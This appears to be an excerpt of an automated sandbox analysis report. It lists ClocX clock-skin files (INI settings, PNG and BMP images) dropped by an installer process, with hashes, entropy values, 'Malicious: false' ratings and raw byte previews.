Preview:	.PNG........IHDR...u.........f.c(....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o.......OIDATx.b...?..'.G?G......=....3>5.;FI ....Q8./>5......&').....%(.............%........."...d... ..=....Tl^.....S&............./!.$.................>FA............F..y....08/M.....#"........\K<............4...........`........................................!%#..$$............a...............ec=u.F~..g._...GR...?.....u............_.n....]. ...^Bf,I.M...u....>K@j...N.......4#("";..........\.............)&........t...................................M +2............N.........u..... ...... ...................%$............"...........7.....&!&.....................................&"7........DMA......./.?&.F.....^54.wS0..........h.....H../;..../.......;K.A..gg...c....v..DD%....B.....!6.-..+......W..<.u.T.8....a...F\.....T....$6N....b.<]...,.&f-.M......].+...@8.1O...Y.E..2Iyp.'d....z. .I0....l..nV..2..9{........x4..ia>..K..r.@:.W.gGU.......yO....W.....Mw0..tw{......}.'..e.S1...q

C:\Program Files (x86)\ClocX\Presets\hallow.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	925
Entropy (8bit):	4.541321371524183
Encrypted:	false
SSDEEP:	24:BEurZuC/Tzbr1nPkLKhaLgGLXoIZKgVi0uzUrn:B9pqnkGUnNU7
MD5:	91E71226494DF487E040FAD190D8D199
SHA1:	B5647C7914884589F55E759A2A140B75CB6BF53F
SHA-256:	4664041204AC6D66DF612C225C7457CCE4CC16619D38ACAA24FB770564B99D07
SHA-512:	4DB2C9ED8BFC1209ABB92B93D59E1B34309228B6DF6C8E82EBD8AEEA6B7CED16956A0DFC74F2CF1EDE48E204552703A5E888A9CBFB668086BE468CD6351143A9
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red).ShowAMPM=1 ;show AM/PM indicator (default 0).AMPMColor=0x00000000.;color of AM/PM indicator..HourColor=0xFFFFFF ;color of hour hand.HourLength=75 ;length of hour hand.HourLap=0 ;overlap of hour hand.HourWidth=6 ;width of hour hand..MinuteColor=0xFFFFFF ;color of minute hand.MinuteLength=150 ;length of minute hand.MinuteLap=0 ;overlap of minute hand.MinuteWidth=3 ;width of minute hand..SecondColor=0xFFFFFF ;color of second hand.SecondLength=140 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=1 ;width of second hand..CenterX=200 ;center point's X (default image_width / 2).CenterY=200 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\hallow.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 400 x 400, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	87695
Entropy (8bit):	7.995775848325961
Encrypted:	true
SSDEEP:	1536:2gdcj1dn9NCguYm6249KZqmzkHcX3qNswTBP/o3wdvdGQwPQSXpTfTWpQdZFT:jcfDyLs9Kkm3oVTBP/hVdO/ll9
MD5:	FA8384D8DA635F35BF502976A6DC7F43
SHA1:	4CAD60130366D35DC1EA05099BAFE6DEA0E566A1
SHA-256:	AF0BC4CF79640A01CF9E991D3F73993FF47D7D148F214AF36B6143C269EF1BC3
SHA-512:	65264E3881E216F3077E724C7130E8D3F5E15F1C318D8A9ADE211D480D6F485B20B5EC0D70ADBF94453498CF2BA319BC1E5CFB25E81DB3F6C78B983294E28127
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............6....+tEXtCreation Time.Mon 8 Oct 2007 20:07:43 -0800........tIME.........L.....pHYs.........B.4.....gAMA......a...U.IDATx....%Uy...^.....g...A.....(..Q.8.C..8(!'rt..........!....OX#. .(...".c...Q.....0.=Ko.......[5].L.{...z......r..V...{.... .. .. .. ...i..3 ..CU.N...H%...j..T..'..).B...P..K!.HA..J..D.H.."..F!lD(.....#.NXlD0.....#.LXhD0...ua.B%.7"..G.0/HA.....x#~@..D...b..dMC....h..).....Z...t.nJ.......l.;C.G._kA....(.....Y.z..RP.+....r.._.uE.To..m.L....vV.nm..:.v.......V[P.g3m..ck.......R.6..{....z....+.c\D..A.@.Ni..]..._G..?P.}P.wA=IAY?....1..........u.R.z..H....x...Ahb.v@.n......p.....Q\|>[.x.p_WS.n...."T...@.['T_..9....I...,....zc.T..:.J@..:.?...y..Q....n..)J.#($7xB......Eo.... 40a;.E5.i.K.Dy....m.V.........N#......:U<F......(L.../.q..\|.(/.......[^_g}.. .1'l'.hf..3t.G.....1J....x:....w{....]+&:z=..C.e.c.x.F.....@m..w.../e.r..=N{..GB}...#......!F..0.......Z).k.^....<#..+O..........A...q9 .^T1S..<.*.ld.].G..^GqI..n"f. D...Dd..]

C:\Program Files (x86)\ClocX\Presets\hallow2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	925
Entropy (8bit):	4.563557273584791
Encrypted:	false
SSDEEP:	24:BEurZuC5CTzbr1nvlVkLKhaLgGLXoIZKgVi0uzUrn:B9Dyn+nkGUnNU7
MD5:	448E7CA51FF946140E484E2B8685E9C5
SHA1:	DA9FD561CDD1783F0B9A43A842F5B301D13B0BCB
SHA-256:	BAECE35CC80C8ABCFA11089AA019FBEEF1878A0E989C3B49C2734F621CBECC67
SHA-512:	04E23B9632F3A4634BE8107C97956304F9BD528BADFB00F6D69574625037D9150ECDEBCA3F8D820A6D5BF53AD7E9DEBC58A5D4EA225C00DBDBB66D8FE8006688
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red).ShowAMPM=1 ;show AM/PM indicator (default 0).AMPMColor=0x00000000.;color of AM/PM indicator..HourColor=0x553FFF ;color of hour hand.HourLength=75 ;length of hour hand.HourLap=0 ;overlap of hour hand.HourWidth=6 ;width of hour hand..MinuteColor=0x18c7f7 ;color of minute hand.MinuteLength=150 ;length of minute hand.MinuteLap=0 ;overlap of minute hand.MinuteWidth=3 ;width of minute hand..SecondColor=0xFFFFFF ;color of second hand.SecondLength=140 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=1 ;width of second hand..CenterX=200 ;center point's X (default image_width / 2).CenterY=200 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\hallow2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 400 x 400, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	87695
Entropy (8bit):	7.995775848325961
Encrypted:	true
SSDEEP:	1536:2gdcj1dn9NCguYm6249KZqmzkHcX3qNswTBP/o3wdvdGQwPQSXpTfTWpQdZFT:jcfDyLs9Kkm3oVTBP/hVdO/ll9
MD5:	FA8384D8DA635F35BF502976A6DC7F43
SHA1:	4CAD60130366D35DC1EA05099BAFE6DEA0E566A1
SHA-256:	AF0BC4CF79640A01CF9E991D3F73993FF47D7D148F214AF36B6143C269EF1BC3
SHA-512:	65264E3881E216F3077E724C7130E8D3F5E15F1C318D8A9ADE211D480D6F485B20B5EC0D70ADBF94453498CF2BA319BC1E5CFB25E81DB3F6C78B983294E28127
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............6....+tEXtCreation Time.Mon 8 Oct 2007 20:07:43 -0800........tIME.........L.....pHYs.........B.4.....gAMA......a...U.IDATx....%Uy...^.....g...A.....(..Q.8.C..8(!'rt..........!....OX#. .(...".c...Q.....0.=Ko.......[5].L.{...z......r..V...{.... .. .. .. ...i..3 ..CU.N...H%...j..T..'..).B...P..K!.HA..J..D.H.."..F!lD(.....#.NXlD0.....#.LXhD0...ua.B%.7"..G.0/HA.....x#~@..D...b..dMC....h..).....Z...t.nJ.......l.;C.G._kA....(.....Y.z..RP.+....r.._.uE.To..m.L....vV.nm..:.v.......V[P.g3m..ck.......R.6..{....z....+.c\D..A.@.Ni..]..._G..?P.}P.wA=IAY?....1..........u.R.z..H....x...Ahb.v@.n......p.....Q\|>[.x.p_WS.n...."T...@.['T_..9....I...,....zc.T..:.J@..:.?...y..Q....n..)J.#($7xB......Eo.... 40a;.E5.i.K.Dy....m.V.........N#......:U<F......(L.../.q..\|.(/.......[^_g}.. .1'l'.hf..3t.G.....1J....x:....w{....]+&:z=..C.e.c.x.F.....@m..w.../e.r..=N{..GB}...#......!F..0.......Z).k.^....<#..+O..........A...q9 .^T1S..<.*.ld.].G..^GqI..n"f. D...Dd..]

C:\Program Files (x86)\ClocX\Presets\iSink.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 110 x 110 x 24, resolution 2834 x 2834 px/m, cbSize 36576, bits offset 54
Category:	dropped
Size (bytes):	36576
Entropy (8bit):	6.648959837326361
Encrypted:	false
SSDEEP:	768:1MVcHjhp9uXNffJo8wYUxkM7z7M0L6lfjnjZMRi:vDsMCXMg
MD5:	A7067FA4CEA0838FFF9ED1C329C02A10
SHA1:	CD35E731C2C95C5589C7F612A4438719018422F6
SHA-256:	953AF43628EE6880A3D574DD0A167F58E7CFA4124F66A82BDC9554F177E229BB
SHA-512:	67E3E329B4B9B1DCE2FBE07A3CB9E95538A34ED6E72D640A9548687827FD237DC7E1CD6D27126B729094E754C13CD836E4901779F3BB0715BC77049E12B6B082
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...n...n...............................................................................................................................................................................}}}rrrjjjeee^^^YYYYYYYYYZZZ```ggglllttt......................................................................................................................................................................................................................................................................................kkkZZZIIIBBB>>>>>>@@@CCCJJJOOOTTT[[[YYYTTTQQQLLLGGGCCC@@@@@@AAALLL[[[nnn........................................................................................................................................................................................................................................................mmmQQQ???AAAHHHZZZttt....................................................rrrXXXGGG>>>===VVVsss.....................................................................

C:\Program Files (x86)\ClocX\Presets\iSink.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	16300
Entropy (8bit):	7.877169129816173
Encrypted:	false
SSDEEP:	384:5LaVln1o68AttjFEJ5w0t/4aCOr7fl5gehzqURT5u6ECv:+O69/g5nlQOr7fl55RT5uJCv
MD5:	B932F8103EDDBD166081D7E308135926
SHA1:	92F0FF8B1B5B14F0E034CD91F27160E813874D9C
SHA-256:	9C9D29270D4AD054D858D04D10300A5705B074298F77DE67DC93EB4C2C41FB19
SHA-512:	7C302F0EC5B1F283CA251A57A6CDF199374D8A5C63D2240A0D00E6F83B429EF11DEF9E974CBDC2EC0681D2754B30B3BBDD27BBC571D45F19D55CE4E6DE993DB5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..?"IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.....0..@..&.....h4..p.....U........-.u...L.,...f3Y.]1...Z,..#.\|..A..b.....=..{.m{..9.}g...6x....O.a..\..y.....EY..$...#,..(......Y..R...!."..;..a.l.F]...y..^M.`.w...rM.H..t......1..u]'?.@......B.0d..yFY....q..ma.&...$IBQ.H......x..WU........?50.t:.._3.....BU.......=.. ...h..8.._.H..J...-...../.?@.Bp...{w .Z..3.Z....#...'U.&.3. .\|P3..~P?.dc...l..h.q.....j...^.4...0b....p.... .TrL.6.k......pww..;w......++..P....C1.(.A.....H.._@.:...[`.y.L.O.={.477.....'nn.O.?..(""... .n......P......F.YC.....P..\\\......5k@...`1.u.V1..Dkk......??...T.b1R.9.\...L`.b`cc........6n..*....%....[w...n.X...o....../0a....d.....PI...4$..0'2.".X..?p...G..1UWWK..].E...GEEY...f@.R.t...P..T._.~.\......APD..z..G.2...1.{..\.........J...m....@......x\|.9.....k.^=x.....D...&.s..... .tP.d..x`..;..<.A..,f.;::,...].9....9.X...

C:\Program Files (x86)\ClocX\Presets\iToolsClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 109 x 114 x 24, resolution 2834 x 2834 px/m, cbSize 37448, bits offset 54
Category:	dropped
Size (bytes):	37448
Entropy (8bit):	6.9477013815160555
Encrypted:	false
SSDEEP:	768:ZeYZtcSt3USJzxy5s8aGBYSrJS33M2NKd7iiARW/nhRn3cBz:X5vFas8naSrmc2NaPWW/v+
MD5:	2331BDBA9C0F6FA92572223E3CB1D2B7
SHA1:	9D855A8D1C1ECFE40D00B27AD40DFBED6AD253D1
SHA-256:	FB39E188154A042D73D47CEADA791C364F3CECA5C6787AAAB05096836CABF7B6
SHA-512:	AEC2E4578CA8564CC3A4B3E50F63D2795F314C452E594F7C610F3E1DE41F4CCF5632630AE0E3427C635F8A79935742DEFFDD8776FA77499714679D30CB1D00F3
Malicious:	false
Reputation:	unknown
Preview:	BMH.......6...(...m...r.............................................................................................................................................................~~~}}}zzzxxxwwwwwwvvvtttttttttrrrrrrrrrrrrrrrrrrssstttuuuuuuvvvwwwxxxzzzzzz}}}~~~..................................................................................................................................................................................................................................~~~zzzuuuttttttqqqpppmmmjjjjjjgggfffeeeeeeeeecccbbbbbb`````````aaaaaabbbbbbccceeeeeeeeeggghhhjjjkkkmmmoooqqqrrruuuwww{{{~~~.................................................................................................................................................................................................{{{wwwsssnnnnnnjjjgggeeedddaaa___^^^ZZZZZZYYYVVVUUUUUUTTTRRRRRRRRROOOOOOOOOPPPQQQRRRRRRRRRTTTUUUUUUXXXYYYZZZ[[[^^^```cccccceeegggjjjlllqqqtttxxx~~~..................................................

C:\Program Files (x86)\ClocX\Presets\iToolsClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	29744
Entropy (8bit):	7.962145343211094
Encrypted:	false
SSDEEP:	768:33epqn5/atVJHkAeHzV2TGjjCIUoqZttx7tP0nmdB9T:3f5e9kAIVbohowj
MD5:	0239C87AD1E60A548109255C1CDDF634
SHA1:	03D224D459FC666A00E8468E656698E7B6D15447
SHA-256:	BA64E4A42FD5847B80B20CD0980ED7A4508BEA01E88C0C6BFA0158860C8323AD
SHA-512:	6A233A1538671C25C11D08ABF8C51A277F62B45007F0174A55FBC0D09766E7BC5A5DA752A3D5AF52C060BF1F45FE568E866D4BDA679996581898E42559BF5433
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..s.IDATx.b...?.(... ..F.`d....M.#....h.... .F......(-.... .V.<`..!...p....[.F..p.......&..Tf..r.g3..F........c'..Wx.....q.....q....Qj.Tv........Y..-u...k".h.......zX........T......R5.44.9'.uN..f0.0W......>...W....X..7U]..\|..d...Ze....=..h..s1Hi..#yf8..2.....2mxv..J..}G...y.C.D......9/.yf..C.r>Sru..z .........[.n. .A .MgW \I<......x.~..'...f.F....4M..6..... jA.H..7.......YD.".K.DZ....[...H.....N.&..V.fA;.0P.K.a.'`#]3...<...h.'.P.3q..P...:..1.......?.......f.......b.&.fp..hff&`.ef`.d..0....l......<?.Y... ......XY.l....03s<gaa.....:.4..LG..Y.)......34.@.j...A ...fqaY0....x.........vFZ..!.a.]....L.....oF....sy..L;..}...!^.N........T.2..)g..+.Jq^..... 3.b..?i....,......`.a.w._v.i.zW...6..@..../c4.X.G..9.6...@m.. ..A......>..Hb.{..+n.}..+.w.8D. ...lo.W.zU......R...(.9c.(%......D.o..A!.29......M8C.......MWa.=x.G...$..b...\|...w.I.B`.{ .b. ....f8.C...

C:\Program Files (x86)\ClocX\Presets\iToolsClock2.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 112 x 112 x 24, resolution 2834 x 2834 px/m, cbSize 37688, bits offset 54
Category:	dropped
Size (bytes):	37688
Entropy (8bit):	5.867000345344529
Encrypted:	false
SSDEEP:	768:/88JTLJqN2AzWf7NhGQYqLhswFrfs6YmUicXZ66gNrHTWOjV:/8g8sAzWf7N4NEtZfgXz06MHTJ5
MD5:	4599B6D452F4FEF6BBB533A2E12CAB3B
SHA1:	9E53546F69F1832C33FAA52CB59154B131991132
SHA-256:	45F75B2EB209AA69FCD83D5945A6EC408DBAA6B63F2EE11440DA2E86153A0ED3
SHA-512:	5F15273223654DAD2204C3188A3551C8BEE188B4B0C895CA8603CC2D0E9322D3615A44D2E18576B9574F7B8222A2826F4D0E8F69CCA6FBB1D4C9F9236C41988A
Malicious:	false
Reputation:	unknown
Preview:	BM8.......6...(...p...p...........................................................................................................................................................................}..gu.Sg.?\.4Y.2^.@j.Na.L[.F[.FY.BZ.=W.7X.2Z.4f.@t.T..j..~..........................................................................................................................................................................................................................................................................gl.FW.0Y.<d.Oc.Oh.Ti.Uk.Xm.[y.iz.jl.[h.Wf.Uj.Xh.Vf.Tj.Xi.Wi.Uk.Vs.`k.V^.@X.0l.H..h..................................................................................................................................................................................................................................................\|u.QY.0[.Aa.Lf.Ql.Yn.[s.`u.cu.ct.bt.bx.h..{..ur.cm.^k.\n.^o._u.dv.du.ex.fz.h..uz.hn.[n.[k.Vg.Q_.FZ.2v.T.......................................................

C:\Program Files (x86)\ClocX\Presets\iToolsClock2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24673
Entropy (8bit):	7.8660373232637575
Encrypted:	false
SSDEEP:	768:xKNFVXxc1+jwftQAyOZ1piMTk07EHwvaa8aktocco:UN7DcJTtTk0g6aa8aVY
MD5:	A0FAB9D64776D909D03745CA21568DD7
SHA1:	75A12DFCC4BB1F1160B534409D9F723AD569AB7F
SHA-256:	6165135988469CF85A4352F5D4FCE2643B8F4C42B367C1D7025CA3B02FCE2FCC
SHA-512:	9CCA132390919646F85034F285C008B261C5ACCCB535224A49872779F1883A3872670CD4293E1FE6DF328FB498879887244C6AD0B7AD200508EF3D4C0957EFEC
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F.._.IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.....0..@...GOq......W...?....6...&.....[...o.....1....../..(.p.00...a.`..$......5#..C.6......3_ddg......V...8...8+.%.}.........Y.{.Y....&.F.$3..%s6 ....@....hA`..df`..bV..w.....a`x.L.....0\|..1/..f...L..'..8.1....v..P.;...........?f..........k..~.#......H..F.<0.Y ..$.Y.X.899..D.........8....1\|`..p...[.._~c`x....@3...?.D..(..?8.0.3.+..e............C.0..PW.).BQ.=J~.....H..&......A+h....4........d..f_ZE.7..{.}.. ...._.:J.0.)._........@..<&..`...6..1.U.~....4..\.8....^j....Jy.9...XD..#.......,.t.......c.F.u..........@......A..\|..s...._L...n.....0.....<8..y.L8..T..Z.........F...<....>.~.p..m...U.....>0~d`.....'..0....A...A1\...P.......c...%.............j....%....L.......a...g.f..........4h..X.....?.yV...SU................N..]9.c..`...3%.S...L@..s..`../. p......?..1,(..`... .,...4..

C:\Program Files (x86)\ClocX\Presets\klokje.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	645
Entropy (8bit):	4.8956136766595355
Encrypted:	false
SSDEEP:	12:a4Eqmz2rrp5pjpuDtOpCRWWh37L4a2Kg1nea90KU9LlTYQUywcG:BEurF5buxOQW8L4ZKg1eY019FUZn
MD5:	6EAFC943CFB82EF659063B558EC46A69
SHA1:	957BC898591918CB6115EC956B736A21F218E3CF
SHA-256:	7D4CF4C12CAA29802E666F1264AB9C6E273DDBB33E1B53228926B5A8C73763F2
SHA-512:	515318860D6D4904BBC323D3FAED4882A105168A1CBDD0D2BD649D8213EAB89D505D8E6CA84E5659CED5879CAE54C4F572ED7596206C8CC054D7C580BB306DA6
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0xff0000 ;cut window by this color (default red).DisableAMPM=0 ;show AM/PM indicator (default 0).AMPMColor=0x201010.;color of AM/PM indicator..HourPNG=klokjehour.hpng.HourPNGCenterDist=13..MinutePNG=klokjemin.hpng.MinutePNGCenterDist=22....SecondColor=0x000000 ;color of second hand.SecondLength=44 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=0.6 ;width of second hand..CenterX=71 ;center point's X (default image_width / 2).CenterY=79 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\klokje.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 142 x 158, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	48325
Entropy (8bit):	7.9918505031475355
Encrypted:	true
SSDEEP:	768:pY9E5Eg1OKxlfjEfgzYBLUkFhtzNKgHrOtGHUzNUGIKkV0QnA75GONU836Y:oyEgX21/tKgHpH4NUGGVA8OLqY
MD5:	8E926836D4B639E64589C7A01CB2DBB8
SHA1:	E38F0941462D65192223F15C80096155BE1C97BC
SHA-256:	B42601106DB4FF9063C0C294A8B1F2A6A2748529D4A9C2815DEE331CB94F0437
SHA-512:	6C448249ED96BC717F0C188C379C4F902DB7F826A0B162B5B5E06A8CA6443C307F155D488BACB70A3F301E772234CA2B4BD48E0B37D85087C637B270CA44ED06
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............kI......pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F...;IDATx.\|PAN.A.....Yb...x ..W..g..E.A..;.3]...J....4__....PI.ty...#i.4....B2..J...R.c9......n...B4..Na..?RGk..0..`%.3.<........q6f.A..'l...w.#...lO..$.....N0.....b@..$..U.....+#:[..nj).c..SS...G....]..."+uV.).B.+.&v5...r.(%.......5.....C.BJx.dHf3N.R.VkQ.f..Y..?..'...a....i4..?...?k.la3.....:e?RW.sc..66....L.2..f....ey.....x$.iS!.....\..M@.D.`.6.....=.........V@+...._..=+.;.j....T..C,4M.".DR..)?..blBb....q...`.s.s......r.\|{}.Z?.......t,.}....96.O....x..........F.5.qE...Q..5..........v..a j'N+U\|...k\QE....7Y.p...f&Vh(.?P.8.@(C._.&.....?..\._...Y.4...,{..~u...S...O.;.u..w......k..l..[.6..+v..tF..[(......yN.i.N.F>.0kQ.dw.............X.=.....~}}.g..NmE.m.....H.'F.1..-].xAWo.._'..b.>.W"M9FcV.d..(.....r.A...h.~.......?...R.&....D...bk..t..rV....^..6YR...D...\|....e.]...q.#..1..6..*...8..W.j..$.t.At.Vz/......3G.....v%..i.....{...TGI...

C:\Program Files (x86)\ClocX\Presets\klokjehour.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 34 x 8, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	1276
Entropy (8bit):	7.204792043876142
Encrypted:	false
SSDEEP:	24:Vq0kBWKRD/SdTcFMjulNQIXRI/XlvSF+2hAJO0Q28cFkoVHqelN:Vq0Op6dTcm6KuIfE9hAA0Q2NFhL7
MD5:	3CE465C5A6FA15ED85F3D78B5D9A669A
SHA1:	D9EB7392ECFB586CC6BA793F44E3EBC6C68D15C6
SHA-256:	C61F93D21895B392CA21395735D01D4514E279EF4BA7A34CC20DECD1B818ECBC
SHA-512:	EA0536484F718A2A919148ACCD6FC906643A8706F413D7DCC53C416C4916EDFF3A9EBF8756F264898947A35824844CFE12F783EF4E060AF7A84D2504E5ACB5DE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..."..........w......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b^.v......vV.>............i.J._...Ky.8....1$,...3L....r033....).....?..Y:..........g"..../_.1..........o&9....8....!...................................Z..E......._......................................................}..........E...............:.......{...................i...2.......r..................E....JFK............................................1...........................-.m.4.<...u................PPQ{...+?..........'...r.... .T....E....ddc...,....fjr........................2..............................E....@FD.B;;....b!%$....................+...L...q !$.......................q..u.S...r.5..I.gd......#`lD...,......?..... #-....G.a~...O.3......?l,L.L..graa.R.z...?..D...q..........dd~...?.f6V............8H@...@.)Y..~\|.,.Z....w.._^2p.3.W7w....7....`...RL.,,@.#.GVV6..~^....?.oN...?....;.&....~.1......_..ll.............+..Y`...t.3(~~.... ....v............

C:\Program Files (x86)\ClocX\Presets\klokjemin.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 50 x 9, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	1896
Entropy (8bit):	7.566424556834186
Encrypted:	false
SSDEEP:	48:+UBnMSY1NiJ7G+lYXQd1GCkVrTzjI2yvf:+UVvbYXc1k1zW
MD5:	9D6062887C1AC43745755AF0DECB59CF
SHA1:	03F8C2912DA77D162468D97B29583446DE040CDD
SHA-256:	1F6F37ADB95BC0E517F8AA261C2EA545368CE5A3893C869DF24F84B2E051109B
SHA-512:	F927E9B556D89717AE7E150CF765436B52AC6F5E8C3E495C341EB0AA4A72AE243819F380BD6A0FE902B41FB4BEF99143354B766766BA5A322072AC2726E72B42
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...2...........OI....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b.t.&.';+..#..,-,.6m............@....g.bV ..bF ..1.... ..K.J7y...].\|.A._....7........R....P..==.`]...5....FLQ.=83....{.............................................!+&4l.....32..{.h.r.S.S...~3p..1<y............1....uqw....@.......................*...................66..D....k.(f.q.&.. 6.U+....e...........p........MRQA...~$%$....++-.66/.............=@>............SQQo........................#" ...e...........p....wmrG.!.....G............../.[Zc.....fhl9........804.......................................q....;w.X....$..g...^.x....'...].&. fe.......\.................o.c..Pg........xyy.....<...X......e...............\...........4.......................>...4.......L...............................................zB.....qr.x.....?F...0..dg`gc...Lo@.....S.h..FV..7...r..20.._..10.>...1202.....'aQA.._..UWW....e................................596.)(%.....;6C................N.

C:\Program Files (x86)\ClocX\Presets\longhorn.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1472
Entropy (8bit):	4.873829154814499
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9BxoaKy4ATORXFB01rfwkpZdGm8bCi+ZQibQ0Wd9iBxLuQI:BzqFluf11FK3fdGmQEZHQJTiBxLvI
MD5:	46C0294FE18ADF12E512CC5CEB02FF8A
SHA1:	7A3D6DCC3452649FB56A22991CD46B2575A8B6FD
SHA-256:	8CFE40FCB3B948BCEB7969332B8F4A1E5955472C98D5B947C0D3AF72F05A82E6
SHA-512:	CDBBFDC50C9EE314E46C607BB5AB1FA11639E07D142CA36A1F993D069322353F22510318A4D5919BFD1749C5B8E350B1E8A31700FDD0C96444C7F288F08A96CF
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0xAA5F55 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xAA5F55 ;color of minute hand..MinuteLength=41 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=42 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....Ce

C:\Program Files (x86)\ClocX\Presets\longhorn.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 126 x 108, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	11115
Entropy (8bit):	7.945943612326477
Encrypted:	false
SSDEEP:	192:BSbxSBebSHnFYdZNEJnPM6Tk2jdQ5yKappg76uyqLi318HhC2e:BSbx64+n2do1PpgqdQ5PapYBL4SCz
MD5:	3768C9DE0BA6520395EF84D7F56C02BF
SHA1:	31A5FB80E4F7DC3BFC2B8BF016EF722BAF2CF2F7
SHA-256:	2F8C5FD250D6F896C96C44984AA11C1B924696DBFD11270D624B68B0B255D521
SHA-512:	34BDB2BCB4DD4A3E19CF49E5427EBB38F4645B4285EDE9555AD1A534C32ADDD6DEBBEA71655A2A87E9B4834FB06E6268ED706EA4519991EDFEF7D332E3F0EBAB
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...~...l......=......pHYs...........~... .IDATx..w.\..y6..g....;3...2.6....c.a...,0AXd.....N.....:...9!........~.O.{.V..3....[.n.p~_:......A._...........K...3.....r....x....Hx.....{.....4.r.o`..o....^.....S......._l..?...........<V]]..D..x\|ww..._._..../..=..O.<..E.x=^.........\|..?y..?.-y.}.\|.-.a.u......Bkhh...'.-m.m...b.......=...b...}<...w/E.[g...>UWW..X,......................p......}...(.p.o .lZ.+W..A...'.d.m.npp..2..B..5..?S......+..x.......e..ik..8....wG..6SzG.ZKJ.cg....J.2.dgf.Y^XX.~.....W..4.w<]YY..*CWW......c..{....\|....E.....lr...?..z......E.e...>....XC.yB.+...rU....t@+..T...h...".......9{..OC.Pp..(...>3....}....u.;.r.d#....v..T7.}W9.$/''wuqi.T.pu.....;g...?....?..x....W%..7 ..q.......O.......g..t...........g...........l.....r..!.!W!.........-..[P.}7.....w.7....ZnA....P......9.C.@. mT..S........E\|...0.....H$.0=.....C..............i..W.U.............g.u/_......1......B..\+...:...z......[w...

C:\Program Files (x86)\ClocX\Presets\mars.png

Download File

